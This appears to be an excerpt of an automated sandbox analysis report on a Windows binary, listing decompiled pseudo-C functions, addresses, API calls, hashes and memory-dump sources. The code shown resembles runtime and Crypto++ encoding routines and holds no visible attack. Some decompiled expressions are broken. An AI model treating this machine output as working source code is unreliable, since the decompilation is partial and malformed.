                    • Opcode ID: dca9c4499f65b42ca210b7a17f4ad6c9324c80dd895054d5063701e4b8e7dbcd
                    • Instruction ID: 2e4ba341dd07af8e2c5466184c8a6bdfb4e3899594aa8b475203414edf77710c
                    • Opcode Fuzzy Hash: dca9c4499f65b42ca210b7a17f4ad6c9324c80dd895054d5063701e4b8e7dbcd
                    • Instruction Fuzzy Hash: 8601FE725043455BE326CFABD881A5AFBE9FB95370F25063EE5C4932C0E630A845C774
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E013C8014(intOrPtr* __ecx, void* __eflags) {
                    				void* _t33;
                    				intOrPtr* _t38;
                    				intOrPtr _t40;
                    				intOrPtr _t43;
                    				intOrPtr* _t50;
                    				void* _t51;
                    				void* _t54;
                    				void* _t55;
                    
                    				_t38 = __ecx;
                    				_push(0x20);
                    				E013F26C2(E01415FCB);
                    				_t50 = _t38;
                    				_push(_t50);
                    				E013C380D(_t51 - 0x14);
                    				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
                    				_t40 =  *((intOrPtr*)( *_t50 + 4));
                    				if(( *(_t40 + _t50 + 0xc) & 0x00000006) == 0) {
                    					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t40 + _t50 + 0x38)))) + 0x28))(_t51 - 0x2c,  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)),  *((intOrPtr*)(_t51 + 0x10)), 2);
                    					_t33 =  *((intOrPtr*)(_t51 - 0x24)) +  *((intOrPtr*)(_t51 - 0x2c));
                    					_t43 =  *((intOrPtr*)(_t51 - 0x20));
                    					asm("adc ecx, [ebp-0x28]");
                    					_t54 = _t33 -  *0x141ef68; // 0xffffffff
                    					if(_t54 == 0) {
                    						_t55 = _t43 -  *0x141ef6c; // 0xffffffff
                    						if(_t55 == 0) {
                    							_t49 =  ==  ?  *( *((intOrPtr*)( *_t50 + 4)) + _t50 + 0xc) | 6 :  *( *((intOrPtr*)( *_t50 + 4)) + _t50 + 0xc) | 0x00000002;
                    							E013C6548( *((intOrPtr*)( *_t50 + 4)) + _t50,  ==  ?  *( *((intOrPtr*)( *_t50 + 4)) + _t50 + 0xc) | 6 :  *( *((intOrPtr*)( *_t50 + 4)) + _t50 + 0xc) | 0x00000002,  ==  ?  *( *((intOrPtr*)( *_t50 + 4)) + _t50 + 0xc) | 6 :  *( *((intOrPtr*)( *_t50 + 4)) + _t50 + 0xc) | 0x00000002, 0);
                    						}
                    					}
                    				}
                    				E013C3EFD(_t51 - 0x14);
                    				return E013F269C(_t50);
                    			}











                    0x013c8014
                    0x013c8014
                    0x013c801b
                    0x013c8020
                    0x013c8022
                    0x013c8026
                    0x013c802d
                    0x013c8031
                    0x013c8039
                    0x013c8050
                    0x013c8056
                    0x013c8059
                    0x013c805c
                    0x013c805f
                    0x013c8065
                    0x013c8067
                    0x013c806d
                    0x013c8087
                    0x013c808b
                    0x013c808b
                    0x013c806d
                    0x013c8065
                    0x013c8093
                    0x013c809f

                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C801B
                      • Part of subcall function 013C380D: __EH_prolog3.LIBCMT ref: 013C3814
                      • Part of subcall function 013C6548: __CxxThrowException@8.LIBVCRUNTIME ref: 013C65B7
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$Exception@8Throw
                    • String ID:
                    • API String ID: 2489616738-0
                    • Opcode ID: 327b5033d281cab5f5bfd93d72b6ff42efd5f04aede9c5688e844c01390a1c51
                    • Instruction ID: 2ff2704d52347e18cb106c12781dc29038a32665ed7b071cdc6fa391a288326d
                    • Opcode Fuzzy Hash: 327b5033d281cab5f5bfd93d72b6ff42efd5f04aede9c5688e844c01390a1c51
                    • Instruction Fuzzy Hash: 7A112734600204EFDB15DB68C8A5FAEB7B1BF58718F14844CE9066B295C772EE42CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E013FDCE4(void* __ecx, intOrPtr _a4) {
                    				signed int _t13;
                    				signed int _t24;
                    				signed int _t25;
                    				intOrPtr _t27;
                    
                    				_t27 = _a4;
                    				if(_t27 == 0) {
                    					 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    					return E013FDA61() | 0xffffffff;
                    				}
                    				_push(_t24);
                    				_t25 = _t24 | 0xffffffff;
                    				if(( *(_t27 + 0xc) >> 0x0000000d & 0x00000001) != 0) {
                    					_t13 = E013FDDDA(_t27); // executed
                    					_t25 = _t13;
                    					E01407497(_t27);
                    					if(E0140776D(E01407888(_t27)) >= 0) {
                    						if( *(_t27 + 0x1c) != 0) {
                    							E014012E1( *(_t27 + 0x1c));
                    							 *(_t27 + 0x1c) =  *(_t27 + 0x1c) & 0x00000000;
                    						}
                    					} else {
                    						_t25 = _t25 | 0xffffffff;
                    					}
                    				}
                    				E0140790D(_t27);
                    				return _t25;
                    			}







                    0x013fdcea
                    0x013fdcef
                    0x013fdcf6
                    0x00000000
                    0x013fdd01
                    0x013fdd09
                    0x013fdd0a
                    0x013fdd12
                    0x013fdd15
                    0x013fdd1b
                    0x013fdd1d
                    0x013fdd33
                    0x013fdd3e
                    0x013fdd43
                    0x013fdd48
                    0x013fdd4c
                    0x013fdd35
                    0x013fdd35
                    0x013fdd35
                    0x013fdd33
                    0x013fdd4e
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e4efe7531f495a3f0dabcdd4042de1fe4d13a4e15b846d9e638e0e89e05fb189
                    • Instruction ID: 9ac50238f7b8366ff768f56537d8480218b66f9085428c5e1c9a8d1eb091e2a3
                    • Opcode Fuzzy Hash: e4efe7531f495a3f0dabcdd4042de1fe4d13a4e15b846d9e638e0e89e05fb189
                    • Instruction Fuzzy Hash: FCF0283261061597DA233AEF9C0CF5A36988FB237DF10073EF664975E0CA74E402C692
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 29%
                    			E013CD970(void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                    				char* _v8;
                    				char _v12;
                    				signed int _v16;
                    				void* _t7;
                    				signed int _t11;
                    				intOrPtr* _t22;
                    				void* _t26;
                    				void* _t28;
                    				void* _t30;
                    
                    				_t18 = _a4;
                    				_push(0x10);
                    				_t7 = E013FF293(_a4); // executed
                    				_t28 = _t26 - 0xc + 8;
                    				if(_t7 != 0) {
                    					L3:
                    					return _t7;
                    				} else {
                    					while(1) {
                    						_t22 = E013F18B4(0);
                    						_t30 = _t28 + 4;
                    						if(_t22 == 0) {
                    							break;
                    						}
                    						E013F18B4(_t22);
                    						 *_t22();
                    						_push(0x10);
                    						_t7 = E013FF293(_t18);
                    						_t28 = _t30 + 0xc;
                    						if(_t7 == 0) {
                    							continue;
                    						} else {
                    							goto L3;
                    						}
                    						goto L10;
                    					}
                    					asm("xorps xmm0, xmm0");
                    					_v12 = 0x141c954;
                    					asm("movq [esp+0x10], xmm0");
                    					_v8 = "bad allocation";
                    					E013F4EC6( &_v12, 0x1431644);
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					_t11 = _v16;
                    					if(_t11 != 0) {
                    						_t6 = (_t11 & 0xfffffffc) - 4; // 0x142e25c, executed
                    						_t11 = L013FDB4D( *_t6); // executed
                    					}
                    					return _t11;
                    				}
                    				L10:
                    			}












                    0x013cd975
                    0x013cd979
                    0x013cd97c
                    0x013cd981
                    0x013cd986
                    0x013cd9af
                    0x013cd9b4
                    0x013cd988
                    0x013cd988
                    0x013cd98f
                    0x013cd991
                    0x013cd996
                    0x00000000
                    0x00000000
                    0x013cd999
                    0x013cd99e
                    0x013cd9a0
                    0x013cd9a3
                    0x013cd9a8
                    0x013cd9ad
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013cd9ad
                    0x013cd9b5
                    0x013cd9b8
                    0x013cd9c9
                    0x013cd9d0
                    0x013cd9d8
                    0x013cd9dd
                    0x013cd9de
                    0x013cd9df
                    0x013ff27e
                    0x013ff283
                    0x013ff288
                    0x013ff28b
                    0x013ff290
                    0x013ff292
                    0x013ff292
                    0x00000000

                    APIs
                      • Part of subcall function 013F18B4: std::_Lockit::_Lockit.LIBCPMT ref: 013F18DD
                      • Part of subcall function 013F18B4: std::_Lockit::~_Lockit.LIBCPMT ref: 013F1905
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013CD9D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Lockitstd::_$Exception@8Lockit::_Lockit::~_Throw
                    • String ID:
                    • API String ID: 2653793986-0
                    • Opcode ID: 6e154564f2b1628754a4a1737feafdb966f3b1f135f652b126a1d91fa3600e3f
                    • Instruction ID: 116a57bd0d325ef33926155322c87f7cf0648985158a2aae87872d463f1fd288
                    • Opcode Fuzzy Hash: 6e154564f2b1628754a4a1737feafdb966f3b1f135f652b126a1d91fa3600e3f
                    • Instruction Fuzzy Hash: 1DF0B43AD4031666D220FAA96C427DBBF994FA5A18F04063EFF4866210F770A54991E3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E013C7158(void* __ecx, void* __edx) {
                    				void* _t11;
                    				void* _t13;
                    				void* _t16;
                    				void* _t20;
                    				void* _t26;
                    				void* _t27;
                    				void* _t28;
                    
                    				_t26 = __edx;
                    				_t20 = __ecx;
                    				_push(8);
                    				E013F26C2(E0141601B);
                    				_t27 = _t20;
                    				if( *((intOrPtr*)(_t27 + 0x4c)) != 0) {
                    					L3:
                    					_t11 = 0;
                    					__eflags = 0;
                    				} else {
                    					_push( *((intOrPtr*)(_t28 + 0x10)));
                    					_push( *((intOrPtr*)(_t28 + 0xc)));
                    					_t13 = E013F17E2( *((intOrPtr*)(_t28 + 8))); // executed
                    					_t32 = _t13;
                    					if(_t13 == 0) {
                    						goto L3;
                    					} else {
                    						E013C5CF0(_t27, _t13, 1);
                    						_push(_t28 - 0x14);
                    						_t16 = E013C6ECF(_t27);
                    						 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
                    						_push(_t16);
                    						E013C5E31(_t27, E013C22F0(_t26, _t32));
                    						E013C3EAF(_t28 - 0x14);
                    						_t11 = _t27;
                    					}
                    				}
                    				return E013F269C(_t11);
                    			}










                    0x013c7158
                    0x013c7158
                    0x013c7158
                    0x013c715f
                    0x013c7164
                    0x013c716a
                    0x013c71b5
                    0x013c71b5
                    0x013c71b5
                    0x013c716c
                    0x013c716c
                    0x013c716f
                    0x013c7175
                    0x013c717d
                    0x013c717f
                    0x00000000
                    0x013c7181
                    0x013c7186
                    0x013c7190
                    0x013c7191
                    0x013c7196
                    0x013c719a
                    0x013c71a4
                    0x013c71ac
                    0x013c71b1
                    0x013c71b1
                    0x013c717f
                    0x013c71bc

                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C715F
                      • Part of subcall function 013C6ECF: __EH_prolog3.LIBCMT ref: 013C6ED6
                      • Part of subcall function 013C22F0: __EH_prolog3_GS.LIBCMT ref: 013C22F7
                      • Part of subcall function 013C22F0: std::_Lockit::_Lockit.LIBCPMT ref: 013C2304
                      • Part of subcall function 013C22F0: std::locale::_Getfacet.LIBCPMT ref: 013C2323
                      • Part of subcall function 013C22F0: std::_Lockit::~_Lockit.LIBCPMT ref: 013C2381
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: H_prolog3Lockitstd::_$GetfacetH_prolog3_Lockit::_Lockit::~_std::locale::_
                    • String ID:
                    • API String ID: 3290716268-0
                    • Opcode ID: 73ceb27997ebf59a62de5eff082623fdd6ac6c3629b0428893460b2829d9a260
                    • Instruction ID: 18d94a75518db542648865c29bfe84d28d00cc384df4613db7d2791bd8b2ae14
                    • Opcode Fuzzy Hash: 73ceb27997ebf59a62de5eff082623fdd6ac6c3629b0428893460b2829d9a260
                    • Instruction Fuzzy Hash: 7EF05EB1A10116ABDF15FB78CC18BAE766AAF74A18F00442DE905A6290DFB5DE048B61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C1039
                      • Part of subcall function 013CA4F0: new.LIBCMT ref: 013CA597
                      • Part of subcall function 013EA4F0: CryptReleaseContext.ADVAPI32(?,00000000,00000001), ref: 013EA580
                      • Part of subcall function 013F243E: __onexit.LIBCMT ref: 013F2444
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ContextCryptH_prolog3Release__onexit
                    • String ID:
                    • API String ID: 2658822964-0
                    • Opcode ID: 304b89e8e23068c874648ece7f950403fc3e903ec4bd1dd3389b7e80c50d4c95
                    • Instruction ID: 72ff210ae412b1938ba12204b83439916959badeb9d5a50468aafe11c4cf5ab5
                    • Opcode Fuzzy Hash: 304b89e8e23068c874648ece7f950403fc3e903ec4bd1dd3389b7e80c50d4c95
                    • Instruction Fuzzy Hash: 81D05E3578131392D925B368882A72E6161ABE4A3DF50544DA3103F3E4DFF589400391
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNEL32(00000000,00000000,?,01411D9B,?,?,00000000,?,01411D9B,00000000,0000000C), ref: 01411A4E
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: da5af344b3c06e484297ebc37713c5445c6197a3a8b32397c5bb351d31872be6
                    • Instruction ID: 715d980bdd1952778004b5d915f0511671bec37a5bd2d8bca4a759a083ab8aba
                    • Opcode Fuzzy Hash: da5af344b3c06e484297ebc37713c5445c6197a3a8b32397c5bb351d31872be6
                    • Instruction Fuzzy Hash: 72D06C3200024DBBDF128E84DD06EDA3FAAFB48714F114000BA1866020C736E821AB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • HeapAlloc.KERNEL32(00000008,?,00000000,?,01406AB6,00000001,00000364,?,?,?,013FDB3F,013FF169,?,?,013C957D,?), ref: 014009F3
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: AllocHeap
                    • String ID:
                    • API String ID: 4292702814-0
                    • Opcode ID: bf9c352d3a60b805163d5e7956bdb4c80fb539927570eb7640cf337391c56ed2
                    • Instruction ID: de80285a4966332b91903d4624f92323e440d14f67ec3fc78bdcc11fd1f6e346
                    • Opcode Fuzzy Hash: bf9c352d3a60b805163d5e7956bdb4c80fb539927570eb7640cf337391c56ed2
                    • Instruction Fuzzy Hash: 40F0E932541126A6FB235A6B8915B7B3F59AF907F0B144233F908EB2F4CA70E80146A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • HeapAlloc.KERNEL32(00000000,?,00000000,?,014013C1,?,00000000,?,00000003,01406A84), ref: 0140134D
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: AllocHeap
                    • String ID:
                    • API String ID: 4292702814-0
                    • Opcode ID: 562df0a24b203f73f6111a8807d77fdd4432dc689c4927a954e27ef6bf3fd2f4
                    • Instruction ID: a4a0e76b298dba61d71fa95a52d3c85b99b25e23397bd377e68ad3dbb3f8f5ed
                    • Opcode Fuzzy Hash: 562df0a24b203f73f6111a8807d77fdd4432dc689c4927a954e27ef6bf3fd2f4
                    • Instruction Fuzzy Hash: B7E030351011169AF723266B58057AB2B599F51FA4B150132EA05D6AF0DA74D80186A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    C-Code - Quality: 82%
                    			E013E8FB0(void* __ebx, void* __ecx, void* __eflags, intOrPtr _a4) {
                    				char _v12;
                    				char _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				void* _v28;
                    				char _v32;
                    				char _v36;
                    				char _v44;
                    				void* _v48;
                    				char _v52;
                    				void* _v56;
                    				char _v60;
                    				char _v64;
                    				char _v68;
                    				char _v72;
                    				void* _v76;
                    				char _v80;
                    				char _v88;
                    				char _v89;
                    				signed char _v90;
                    				char _v92;
                    				intOrPtr* _v124;
                    				char _v144;
                    				signed int _v148;
                    				intOrPtr* _v228;
                    				char _v240;
                    				char _v248;
                    				char _v252;
                    				char _v256;
                    				intOrPtr _v260;
                    				char _v268;
                    				char _v272;
                    				char _v276;
                    				char _v280;
                    				char _v284;
                    				intOrPtr _v288;
                    				char _v296;
                    				char _v300;
                    				char _v304;
                    				void _v308;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t138;
                    				signed int _t139;
                    				signed int _t150;
                    				signed int _t151;
                    				signed int _t156;
                    				signed int _t163;
                    				signed int _t168;
                    				char _t173;
                    				char _t175;
                    				void* _t184;
                    				signed int _t189;
                    				signed int _t190;
                    				signed int _t193;
                    				signed int _t198;
                    				signed int _t203;
                    				void* _t213;
                    				signed int* _t214;
                    				signed int _t215;
                    				char* _t222;
                    				char* _t226;
                    				signed int _t230;
                    				void* _t235;
                    				void* _t237;
                    				signed int _t252;
                    				signed int _t253;
                    				signed int _t261;
                    				signed int _t268;
                    				void* _t272;
                    				void* _t278;
                    				signed int _t280;
                    				void* _t282;
                    				intOrPtr _t284;
                    				intOrPtr* _t285;
                    				char* _t286;
                    				signed int _t292;
                    				void* _t294;
                    				void* _t295;
                    				void* _t297;
                    				void* _t298;
                    				signed int* _t300;
                    				signed int _t301;
                    				char* _t302;
                    				intOrPtr* _t303;
                    				signed int _t308;
                    				signed int _t310;
                    				signed int _t311;
                    				void* _t313;
                    				signed int _t314;
                    				signed int _t315;
                    				void* _t330;
                    				void* _t332;
                    
                    				_push(0xffffffff);
                    				_push(E01417A40);
                    				_push( *[fs:0x0]);
                    				_t314 = _t313 - 0x44;
                    				_t138 =  *0x1435234; // 0x78d9f939
                    				_t139 = _t138 ^ _t310;
                    				_v20 = _t139;
                    				_push(_t139);
                    				 *[fs:0x0] =  &_v16;
                    				_t213 = __ecx;
                    				_t284 = _a4;
                    				E013E8D30(__ecx, _t284, "BaseN_Decoder", "DecodingLookupArray", __ecx + 0x18);
                    				_t300 = __ecx + 0x20;
                    				E013CED50(__ecx, _t284, "BaseN_Decoder", "Log2Base", _t300);
                    				_t301 =  *_t300;
                    				if(_t301 <= 0 || _t301 >= 8) {
                    					_v68 = 0xf;
                    					_v72 = 0;
                    					_v88 = 0;
                    					E013C64B7( &_v88, __eflags, "BaseN_Decoder: Log2Base must be between 1 and 7 inclusive", 0x39);
                    					asm("xorps xmm0, xmm0");
                    					_v12 = 0;
                    					asm("movq [ebp-0x34], xmm0");
                    					_v12 = 1;
                    					_t222 =  &_v48;
                    					_v64 = 0x141a7b8;
                    					_v52 = 1;
                    					_v28 = 0xf;
                    					_v32 = 0;
                    					_v48 = 0;
                    					E013C63D3(_t222, _t272,  &_v88, 0, 0xffffffff);
                    					_v12 = 0;
                    					_v64 = 0x141a97c;
                    					E013F4EC6( &_v64, 0x1430adc);
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					_push(_t310);
                    					_t311 = _t314;
                    					_push(0xffffffff);
                    					_push(E01417A80);
                    					_push( *[fs:0x0]);
                    					_t315 = _t314 - 0x48;
                    					_t150 =  *0x1435234; // 0x78d9f939
                    					_t151 = _t150 ^ _t311;
                    					_v148 = _t151;
                    					_push(_t213);
                    					_push(_t301);
                    					_push(_t284);
                    					_push(_t151);
                    					 *[fs:0x0] =  &_v144;
                    					_t302 = _t222;
                    					_t285 = _v124;
                    					E013E8BF0(_t213, _t285, "BaseN_Encoder", "EncodingLookupArray", _t302 + 0x18);
                    					_t214 = _t302 + 0x20;
                    					E013CED50(_t214, _t285, "BaseN_Encoder", "Log2Base", _t214);
                    					_t156 =  *_t214;
                    					__eflags = _t156;
                    					if(__eflags <= 0) {
                    						L28:
                    						_v72 = 0xf;
                    						_v76 = 0;
                    						_v92 = 0;
                    						E013C64B7( &_v92, __eflags, "BaseN_Encoder: Log2Base must be between 1 and 7 inclusive", 0x39);
                    						asm("xorps xmm0, xmm0");
                    						_v16 = 0;
                    						asm("movq [ebp-0x34], xmm0");
                    						_v16 = 1;
                    						_t226 =  &_v52;
                    						_v68 = 0x141a7b8;
                    						_v56 = 1;
                    						_v32 = 0xf;
                    						_v36 = 0;
                    						_v52 = 0;
                    						E013C63D3(_t226, _t272,  &_v92, 0, 0xffffffff);
                    						_v16 = 0;
                    						_v68 = 0x141a97c;
                    						E013F4EC6( &_v68, 0x1430adc);
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						_t163 =  *0x1435234; // 0x78d9f939
                    						 *[fs:0x0] =  &_v248;
                    						_t286 = _t226;
                    						_t303 = _v228;
                    						_t168 =  *((intOrPtr*)( *((intOrPtr*)( *_t303 + 4))))("GroupSize", 0x1435f50,  &_v308, _t163 ^ _t315, _t285, _t302,  *[fs:0x0], E01417ADC, 0xffffffff, _t311);
                    						_v260 = 0xffffffff;
                    						__eflags = _t168;
                    						_v256 = 0;
                    						_v252 = 0;
                    						_t230 =  !=  ? _v308 : 0;
                    						 *(_t286 + 0x38) = _t230;
                    						_v272 = 0;
                    						_v268 = 0;
                    						_v276 = 0;
                    						_v240 = 3;
                    						_v288 = 0xffffffff;
                    						_v284 = 0;
                    						_v280 = 0;
                    						_v300 = 0;
                    						_v296 = 0;
                    						_v304 = 0;
                    						_v240 = 7;
                    						__eflags = _t230;
                    						if(_t230 == 0) {
                    							 *((intOrPtr*)( *_t303 + 4))("Separator", 0x1435f20,  &_v52);
                    						} else {
                    							E013E8E70(_t214, _t303, "Grouper", "Separator",  &_v52);
                    						}
                    						 *((intOrPtr*)( *_t303 + 4))("Terminator", 0x1435f20,  &_v80);
                    						__eflags = _v52;
                    						if(__eflags == 0) {
                    							_t173 = _v44;
                    							_t235 = _v48;
                    						} else {
                    							_t173 = _v32;
                    							_t235 = _v28;
                    						}
                    						E013C4844(_t286 + 0x18, __eflags, _t235, _t173);
                    						__eflags = _v80;
                    						if(__eflags == 0) {
                    							_t175 = _v72;
                    							_t237 = _v76;
                    						} else {
                    							_t175 = _v60;
                    							_t237 = _v56;
                    						}
                    						E013C4844(_t286 + 0x28, __eflags, _t237, _t175);
                    						 *((intOrPtr*)(_t286 + 0x3c)) = 0;
                    						__eflags = _v64 - _v60;
                    						_v16 = 8;
                    						_t240 =  >=  ?  &_v60 :  &_v64;
                    						_t241 =  *( >=  ?  &_v60 :  &_v64);
                    						memset(_v56, 0,  *( >=  ?  &_v60 :  &_v64) << 0);
                    						L013CDA60(_v56);
                    						__eflags = _v36 - _v32;
                    						_t244 =  >=  ?  &_v32 :  &_v36;
                    						_v16 = 9;
                    						__eflags = 0;
                    						_t245 =  *( >=  ?  &_v32 :  &_v36);
                    						memset(_v28, 0,  *( >=  ?  &_v32 :  &_v36) << 0);
                    						_t184 = L013CDA60(_v28);
                    						 *[fs:0x0] = _v24;
                    						return _t184;
                    					} else {
                    						__eflags = _t156 - 8;
                    						if(__eflags >= 0) {
                    							goto L28;
                    						} else {
                    							_t189 =  *((intOrPtr*)( *((intOrPtr*)( *_t285 + 4))))("PaddingByte", 0x1438508,  &_v90);
                    							__eflags = _t189;
                    							if(_t189 == 0) {
                    								L20:
                    								_t190 = _t189 | 0xffffffff;
                    								__eflags = _t190;
                    							} else {
                    								_t189 =  *((intOrPtr*)( *((intOrPtr*)( *_t285 + 4))))("Pad", 0x1435f5c,  &_v89);
                    								__eflags = _t189;
                    								if(_t189 == 0) {
                    									L19:
                    									_t190 = _v90 & 0x000000ff;
                    								} else {
                    									__eflags = _v89;
                    									if(_v89 == 0) {
                    										goto L20;
                    									} else {
                    										goto L19;
                    									}
                    								}
                    							}
                    							_t292 =  *_t214;
                    							_t252 = 8;
                    							 *(_t302 + 0x1c) = _t190;
                    							asm("cdq");
                    							 *((intOrPtr*)(_t302 + 0x2c)) = 0;
                    							 *((intOrPtr*)(_t302 + 0x28)) = 0;
                    							__eflags = 8 % _t292;
                    							if(8 % _t292 != 0) {
                    								do {
                    									_t252 = _t252 + 8;
                    									_t198 = _t252;
                    									asm("cdq");
                    									__eflags = _t198 % _t292;
